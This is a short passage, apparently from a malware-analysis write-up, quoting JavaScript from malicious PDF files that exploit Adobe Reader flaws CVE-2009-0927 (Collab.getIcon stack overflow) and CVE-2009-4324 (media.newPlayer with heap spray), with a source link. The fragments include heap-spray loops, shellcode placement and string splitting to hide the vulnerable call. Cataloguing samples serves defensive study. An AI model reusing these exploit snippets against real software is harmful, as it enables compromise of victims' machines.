i ++ ){ buffer[i] = unescape("%0a%0a%0a%0a"); } var strtmp3 = "Collab.get" + "Icon(buffer+'_N.bundle');"; eval(strtmp3); CVE-2009-0927 - collab.getIcon() [buffer overflow on stack] for (i = 0; i < 200; i ++ )memory[i] = block + shellcode; try { this .media.newPlayer(null); } catch (e){} util.printd(String.fromCharCode(2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 257 , 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570), new Date()); } CVE-2009-4324 - media.newplayer [with heap spray] http://contagiodump.blogspot.com/2010/08/aug-3-cve-2009-0927-cve-2009-4324-cve.html